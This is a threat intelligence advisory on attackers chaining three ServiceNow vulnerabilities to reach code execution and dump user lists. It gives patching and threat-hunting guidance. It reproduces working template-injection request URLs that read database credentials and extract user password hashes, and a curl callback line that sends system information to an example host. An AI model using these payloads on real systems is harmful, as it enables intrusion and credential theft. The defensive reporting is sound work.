Attackers Exploit Chain of Vulnerabilities in ServiceNow to Dump User List

By Adversary Tactics and Intelligence Team

Estimated Reading Time: 6 minutes

Vulnerability Exploitation – Remote Code Execution – ServiceNow  CVE-2024-4879, CVE-2024-5217, and CVE-2024-5178 – Information – Utilities – Public Administration

The Rundown

Deepwatch is warning customers and organizations regarding attackers exploiting a chain of three vulnerabilities in ServiceNow to dump the user list and collect associated meta-data from compromised instances. This activity was described in a blog post published July 24th by Resecurity.

The observed exploitation of these vulnerabilities in ServiceNow elevates the risks to organizations running vulnerable instances. Attackers can use the data gathered from exploitation attempts for cyberespionage and further targeting. Therefore, organizations should immediately apply updates to deny attackers the ability to exploit these vulnerabilities in attacks.

If you have questions or feedback about this intelligence, you can submit them here.

ServiceNow Exploitation

On July 11, 2024, Assetnote published a technical write-up that describes how three vulnerabilities in ServiceNow can be chained together to allow an attacker access to the application’s database and achieve command execution on the host system that the application is running on. These host systems typically reside within an organization’s internal network which could lead to further compromise to other systems.

The write-up describes three bugs that need to be exploited to allow access to the database. The first bug is the title injection issue (CVE-2024-4879), the second bug is the template injection mitigation bypass (CVE-2024-5217) and the final bug is the filesystem filter bypass (CVE-2024-5178). By crafting a single request that addresses each of these bugs, an attacker can gain access to sensitive tables.

Analyst Note: An attacker does not have to chain all three vulnerabilities together. They can chain just the first two (CVE-2024-4879 & CVE-2024-5217) to achieve code execution. The last vulnerability (CVE-2024-5178) allows the attacker to bypass access controls on certain tables. An attacker could chain the first two vulnerabilities to implant a webshell or other malware types.

/login.do?jvar_page_title=<style><foo>abc</foo></style>

Request to perform title injection, allowing the injection of any template content. Source Assetnote

/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>

Request to bypass template injection mitigation and achieve code execution. Source Assetnote

/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>

Request to bypass filesystem filter and dump the full database credentials. Source Assetnote

Analyst Note: Assetnote warns that since cloud-hosted ServiceNow instances require access to data from the internal network, enterprises commonly configure a proxy server, also known as an MID Server that sits inside a company’s internal network. Due to the design of ServiceNow, administrator access on a ServiceNow instance leads to command execution on the MID Server, therefore the impacts of an authentication bypass could be quite severe.

On July 24th, Resecurity published a blog post describing how their network sensors logged multiple ServiceNow exploitation attempts that followed a three stage process. Each stage used a single request, which appeared to chain these vulnerabilities together and is similar to the request described in Assetnote’s write-up.

The first stage of these attempts involved the attackers sending a specially crafted request, which allowed the attackers to confirm whether a specific ServiceNow instance was vulnerable. In these probing requests, the attackers injected a specially crafted payload, checking that the server’s response returned the results expected. This request, if successful, displays an error message with the value of 1337 (668.5*2).

/login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(668.5*2);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E

Request observed to verify if the instance is vulnerable. Source Resecurity

The second stage of exploitation involved sending a second request by injecting a different payload that checks for the database’s availability and contents. If successful, the vulnerable instance would return details about the database. This request, if successful, displays an error message displaying key database details, such as the database’s name, url, and the user and password.

/login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate
%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf
glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:j

Request to verify the database’s availability and contents. Source Resecurity

The final stage, using the information obtained from the second stage, involved the attackers sending a third request by injecting a different payload, which shows an error message of the user lists and associated meta-data from compromised instances. However, according to Resecurity, in most cases this data was hashed.

/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gr=new GlideRecord("sys_user");gr.query();s="";while(gr.next())s=s.concat(gr.user_name," : ",gr.user_password,"<br/>");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>

Request to dump the user list and collect associated meta-data. Source Resecurity

Based on Resecurity’s analysis, due to the complexity of the hashing algorithm, the attackers were unsuccessful in cracking most hashes. However, Resecurity’s blog post states that the disclosed information could facilitate cyberespionage and reconnaissance efforts.

Targeting

Resecurity continued further monitoring and identified that multiple organizations were targeted in these attacks across various geographies and market verticals, including but not limited to organizations in the information and utilities, and public administration sectors. However, all sectors may be targeted. 

Details of the Vulnerabilities

On July 10, 2024 3 vulnerabilities (CVE-2024-4879, CVE-2024-5217, and CVE-2024-5178) impacting ServiceNow were added to the National Vulnerability Database (NVD).

  • CVE-2024-4879 is a Jelly template injection vulnerability in ServiceNow UI Macros affecting Vancouver and Washington DC releases and could allow an unauthenticated attacker to remotely execute code. This vulnerability has a CVSS 3.x Score 9.8 (Critical).
  • CVE-2024-5217 is an incomplete input validation vulnerability in GlideExpression Script affecting the Washington DC, Vancouver, and earlier releases that could allow an unauthenticated attacker to remotely execute code. This vulnerability has a CVSS 3.x Score 9.8 (Critical).
  • CVE-2024-5178 is an incomplete input validation vulnerability in the SecurelyAccess API that affects the Washington DC, Vancouver, and Utah releases that could allow an attacker with administrative privileges to gain unauthorized access to sensitive files on the web application server. This vulnerability has a CVSS 3.x Score 4.9 (Medium).

Actions & Recommendations

Deepwatch experts continuously monitor for threats to our customers and their ServiceNow environments when logging is available. The Adversary Tactics and Intelligence team regularly develops and updates detection signatures based on our intelligence operations. We also use this intelligence report to conduct threat hunting. However, Deepwatch experts can not discover all activity due to limitations in the log sources that Deepwatch receives.

We recommend the following actions and recommendations to enhance cyber resilience:

  • ServiceNow released patches for these vulnerabilities during the June 2024 patching cycle. 
  • Review Internet facing assets to ensure they are updated and prioritized for patching.
  • Utilize Web Application Firewalls (WAFs).
  • Limit Access to this application directly from the Internet.
  • Ensure defensive network architecture and segmentation is in place for applications that are Internet facing.
  • Ensure authentication logging is enabled for all successful logins.
  • For on-premise solutions ensure that host-based security protections such as an are in place.

Technical Artifacts

We recommend that all customers retrospectively hunt for malicious activity, which will likely indicate compromise, using the Be On the Lookout (BOLO) guidance provided below:

  • Inbound web requests matching the below syntax directed at relevant ServiceNow applications (may be URL encoded depending on the dataset)
    • /login.do?jvar_page_title=<style><j:jelly xmlns:j=\”jelly\” xmlns:g=’glide’><g:evaluate>gs.addErrorMessage(7*191);</g:evaluate></j:jelly></style>”
    • /login.do?jvar_page_title=<style><j:jelly xmlns:j=”jelly:core” xmlns:g=’glide’><g:evaluate>z=new Packages.java.io.File(“”).getAbsolutePath();z=z.substring(0,z.lastIndexOf(“/”));u=new SecurelyAccess(z.concat(“/co..nf/glide.db.properties”)).getBufferedReader();s=””;while((q=u.readLine())!==null)s=s.concat(q,”\n”);gs.addErrorMessage(s);</g:evaluate></j:jelly></style>”
    • /login.do?jvar_page_title=<style><j:jelly xmlns:j=”jelly” xmlns:g=’glide’><g:evaluate>gs.addErrorMessage(668.5*2);</g:evaluate></j:jelly></style>
    • /login.do?jvar_page_title=<style><j:jelly xmlns:j=”jelly:core” xmlns:g=’glide’><g:evaluate>z=new Packages.java.io.File(“”).getAbsolutePath();z=z.substring(0,z.lastIndexOf(“/”));u=new SecurelyAccess(z.concat(“/co..nfglide.db.properties”)).getBufferedReader();s=””;while((q=u.readLine())!==null)s=s.concat(q,”\n”);gs.addErrorMessage(s);</g:evaluate></j:jelly></style>”
    • /login.do?jvar_page_title=<style><j:jelly xmlns:j=”jelly” xmlns:g=’glide’><g:evaluate>gr=new GlideRecord(“sys_user”);gr.query();s=””;while(gr.next())s=s.concat(gr.user_name,” : “,gr.user_password,”<br/>”);gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
  • IDS alerts relating to the following CVE’s
    • CVE-2024-4879 – (Jelly Template Injection Vulnerability)
    • CVE-2024-5217 – (Incomplete Input Validation in GlideExpression Script)
    • CVE-2024-5178 – (Incomplete Input Validation in SecurelyAccess API)
  • Rare/anomalous network connections from internal MID Servers that may indicate lateral movement from the primary ServiceNow instance (even cloud-based instances)
  • Rare/anomalous outbound web traffic from MID servers (especially with a curl/wget user agent) and/or execution of curl as shown below:
    • curl http://my.honeypot.server[.]example/?x=$(uname -a|base64 -w0)
      • This functions as a callback on MID Servers to confirm code execution, perform reconnaissance on the MID Server itself or surrounding network, and/or confirm the egress point (external IP) the MID Server is positioned behind
  • Rare/anomalous process execution on MID Servers, especially under C:\ServiceNow\ServiceNow MID Server <TRUNCATED>\agent\jre\bin\java.exe (see above curl example)

Sources:

Share

LinkedIn Twitter YouTube

Subscribe to the Deepwatch Insights Blog